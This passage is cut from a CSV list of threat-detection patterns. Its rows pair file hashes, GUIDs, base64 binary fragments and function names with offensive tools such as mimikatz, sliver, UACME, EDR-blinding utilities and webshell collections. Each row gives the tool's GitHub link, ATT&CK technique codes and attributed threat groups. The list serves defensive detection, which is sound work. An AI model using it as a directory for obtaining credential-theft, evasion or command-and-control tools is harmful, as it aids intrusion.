Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32893" "*aa64f8d9cbcb6860541a56e17a6ca22371553ff32e01d218718b2155e7b8e475*",".{0,1000}aa64f8d9cbcb6860541a56e17a6ca22371553ff32e01d218718b2155e7b8e475.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","32894" "*aa659878813ee6b5ecb42d5d069fc48255b10337a357eb70fb5c002996c77239*",".{0,1000}aa659878813ee6b5ecb42d5d069fc48255b10337a357eb70fb5c002996c77239.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#filehash","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","32895" "*aa6e70c1f44cc2d9ff2fd6ad67ffc7ff63d33bd63cf1059e185a588f9e0cc0ff*",".{0,1000}aa6e70c1f44cc2d9ff2fd6ad67ffc7ff63d33bd63cf1059e185a588f9e0cc0ff.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense 
Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","32898" "*aa76179bd24e773ebf82edcbc58ba4f82c7b660883cc504d40f915fdabd35112*",".{0,1000}aa76179bd24e773ebf82edcbc58ba4f82c7b660883cc504d40f915fdabd35112.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32899" "*aa795eb7547007799a7e842878d781c0cc44ac61a7040204c5086ef84232a451*",".{0,1000}aa795eb7547007799a7e842878d781c0cc44ac61a7040204c5086ef84232a451.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32900" "*aa862e916af73e90f28c1407d5a411121cb33eeee5bf1bd2f130887b3dbdfd7f*",".{0,1000}aa862e916af73e90f28c1407d5a411121cb33eeee5bf1bd2f130887b3dbdfd7f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32902" "*aa8b4f53e6ca8db9d8b13db3b0a250724b9ef472d99bb5c1ad0da8e10f7c95c7*",".{0,1000}aa8b4f53e6ca8db9d8b13db3b0a250724b9ef472d99bb5c1ad0da8e10f7c95c7.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","32905" "*aa8cfc4df8dea4d1fe806aef767c9c0f522ab3f49cc471c19bb0851dda5448fc*",".{0,1000}aa8cfc4df8dea4d1fe806aef767c9c0f522ab3f49cc471c19bb0851dda5448fc.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","32906" "*aa96d396459aa3f3456ec948d37d92cb605fee98c72a5b64215c259113660518*",".{0,1000}aa96d396459aa3f3456ec948d37d92cb605fee98c72a5b64215c259113660518.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32907" "*aa980ebc0a241b454e61cba4c13767a8d203993dfd5d42db36a2958f9e6b3621*",".{0,1000}aa980ebc0a241b454e61cba4c13767a8d203993dfd5d42db36a2958f9e6b3621.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32908" "*aaa488ddde993d708967f1bd5ec942b367cf04abf5bcac865a5361319075c615*",".{0,1000}aaa488ddde993d708967f1bd5ec942b367cf04abf5bcac865a5361319075c615.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32910" "*aaa6041912a6ba3cf167ecdb90a434a62feaf08639c59705847706b9f492015d*",".{0,1000}aaa6041912a6ba3cf167ecdb90a434a62feaf08639c59705847706b9f492015d.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","#filehash","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","32911" "*AAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gR*",".{0,1000}AAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gR.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","32912" 
"*AAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAC4Fx3y/HZzofx2c6H8dnOh4iTgof52c6GTANih+XZzoefr7aHvdnOh9Q7gofl2c6H8dnKhoHZzoefr2aGVdnO*",".{0,1000}AAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAC4Fx3y\/HZzofx2c6H8dnOh4iTgof52c6GTANih\+XZzoefr7aHvdnOh9Q7gofl2c6H8dnKhoHZzoefr2aGVdnO.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","32913" "*AAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACp8yO07ZJN5+2STeftkk3n88De5++STeeC5Obn6JJN5/YP5ufFkk3n9g/n54ySTef2D9Pn55JN5+Tq3ufokk3*",".{0,1000}AAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACp8yO07ZJN5\+2STeftkk3n88De5\+\+STeeC5Obn6JJN5\/YP5ufFkk3n9g\/n54ySTef2D9Pn55JN5\+Tq3ufokk3.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","32914" "*aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.exe*",".{0,1000}aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\.exe.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - 
TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","32915" "*AAAADkl0J3MgbWUgYnJ1ZGkhAQIDBAUGBw==*",".{0,1000}AAAADkl0J3MgbWUgYnJ1ZGkhAQIDBAUGBw\=\=.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","32916" "*AAABAAMAEBAAAAEAIABoBAAANgAAACAgAAABACAAKBEAAJ4EAAAwMAAAAQAgAGgmAADGFQAAKAAAABAAAAAgAAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP39*",".{0,1000}AAABAAMAEBAAAAEAIABoBAAANgAAACAgAAABACAAKBEAAJ4EAAAwMAAAAQAgAGgmAADGFQAAKAAAABAAAAAgAAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP39.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","32917" "*aaad2f2baf694d48d712e346588654b34efc098d6443114600dc45621aa590b2*",".{0,1000}aaad2f2baf694d48d712e346588654b34efc098d6443114600dc45621aa590b2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32918" "*aab2975ed85ae44e318e705da1bd5d80ebd150affe9d11144473452cf919e928*",".{0,1000}aab2975ed85ae44e318e705da1bd5d80ebd150affe9d11144473452cf919e928.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered 
Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32921" "*AAB4D641-C310-4572-A9C2-6D12593AB28E*",".{0,1000}AAB4D641\-C310\-4572\-A9C2\-6D12593AB28E.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","#GUIDproject","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","32923" "*aab70f27573e8f6507ab19843595e8461d5f0e45500bddd6023e5266c123267b*",".{0,1000}aab70f27573e8f6507ab19843595e8461d5f0e45500bddd6023e5266c123267b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32924" "*AAB75969-92BA-4632-9F78-AF52FA2BCE1E*",".{0,1000}AAB75969\-92BA\-4632\-9F78\-AF52FA2BCE1E.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","#GUIDproject","N/A","10","7","614","69","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z","32925" 
"*aab9002fa530e777ab0dac8b5aa470d6733f1d54d2316c58db6e244726b5cf19*",".{0,1000}aab9002fa530e777ab0dac8b5aa470d6733f1d54d2316c58db6e244726b5cf19.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32926" "*aac934f5656f3d2f861a4e0ccaa83175bb2fa9f5b8d893192ec287f2097bf18a*",".{0,1000}aac934f5656f3d2f861a4e0ccaa83175bb2fa9f5b8d893192ec287f2097bf18a.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","32928" "*aacf6ed6e4b999a6338d5a025350ea5a*",".{0,1000}aacf6ed6e4b999a6338d5a025350ea5a.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","32931" "*aad7684c2412f03604be79ddb5ac0884105ced7459eb94fa0da6a7910648b3b1*",".{0,1000}aad7684c2412f03604be79ddb5ac0884105ced7459eb94fa0da6a7910648b3b1.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","32932" "*AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy*",".{0,1000}AAEAAAD\/\/\/\/\/AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#base64","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","32939" "*aaec79f0e98582cc0ae90fa4fc34f134454cd4be0ff4cd3e5078f20b516dc669*",".{0,1000}aaec79f0e98582cc0ae90fa4fc34f134454cd4be0ff4cd3e5078f20b516dc669.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32940" 
"*aaed9c124d3a6fb221a85b554f6b71dfa58e64838e33454efd59b91675818a38*",".{0,1000}aaed9c124d3a6fb221a85b554f6b71dfa58e64838e33454efd59b91675818a38.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","32941" "*aaee8c23fcc20569816c9f29b25df968cddf3836e80f2ff6b509a0caef68ffc5*",".{0,1000}aaee8c23fcc20569816c9f29b25df968cddf3836e80f2ff6b509a0caef68ffc5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32942" "*aaef424188f507186ba653af6061eeb2308ded4c9f56716239ae667f9ddbd761*",".{0,1000}aaef424188f507186ba653af6061eeb2308ded4c9f56716239ae667f9ddbd761.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32943" "*aaf31c321bb2d6df18c0a0ed426388fed0ab27feaab35de388cbbf8f6ae25727*",".{0,1000}aaf31c321bb2d6df18c0a0ed426388fed0ab27feaab35de388cbbf8f6ae25727.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - 
T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","32945" "*aafc409ee997c45ec84a4c5db029046b1b2a5dc88d6d3f720fcce26085378e74*",".{0,1000}aafc409ee997c45ec84a4c5db029046b1b2a5dc88d6d3f720fcce26085378e74.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32947" "*aafdc7daa6d0f982d64819a332aebc9576b166c78c38a16b065274e8c5dc518e*",".{0,1000}aafdc7daa6d0f982d64819a332aebc9576b166c78c38a16b065274e8c5dc518e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32949" "*aafdc7daa6d0f982d64819a332aebc9576b166c78c38a16b065274e8c5dc518e*",".{0,1000}aafdc7daa6d0f982d64819a332aebc9576b166c78c38a16b065274e8c5dc518e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32950" "*aaff9defdd75eb977d2b48f3dfca82641c91a243f04ca99975034880e2170b28*",".{0,1000}aaff9defdd75eb977d2b48f3dfca82641c91a243f04ca99975034880e2170b28.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32951" 
"*AAP-AddToHighPrivilegePrincipalMap*",".{0,1000}AAP\-AddToHighPrivilegePrincipalMap.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","32953" "*AAP-CheckIfMemberOfPrivilegedDirectoryRole*",".{0,1000}AAP\-CheckIfMemberOfPrivilegedDirectoryRole.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","32954" "*AAP-DisplayApplicableMFAConditionalAccessPolicyForUserID*",".{0,1000}AAP\-DisplayApplicableMFAConditionalAccessPolicyForUserID.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","32955" "*AAP-DisplayHighPrivilegePrincipalMap*",".{0,1000}AAP\-DisplayHighPrivilegePrincipalMap.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","32956" 
"*AAP-DisplayNonHighPrivilegedRoleAssignments*",".{0,1000}AAP\-DisplayNonHighPrivilegedRoleAssignments.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","32957" "*AAP-GetHighPrivilegedDirectoryRoleTemplateMap*",".{0,1000}AAP\-GetHighPrivilegedDirectoryRoleTemplateMap.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","32958" "*aardwolf.extensions.RDPEDYC.vchannels.socksoverrdp import SocksOverRDPChannel*",".{0,1000}aardwolf\.extensions\.RDPEDYC\.vchannels\.socksoverrdp\simport\sSocksOverRDPChannel.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","32959" "*aazsbsgya565vlu2c6bzy6yfiebkcbtvvcytvolt33s77xypi7nypxyd.onion*",".{0,1000}aazsbsgya565vlu2c6bzy6yfiebkcbtvvcytvolt33s77xypi7nypxyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
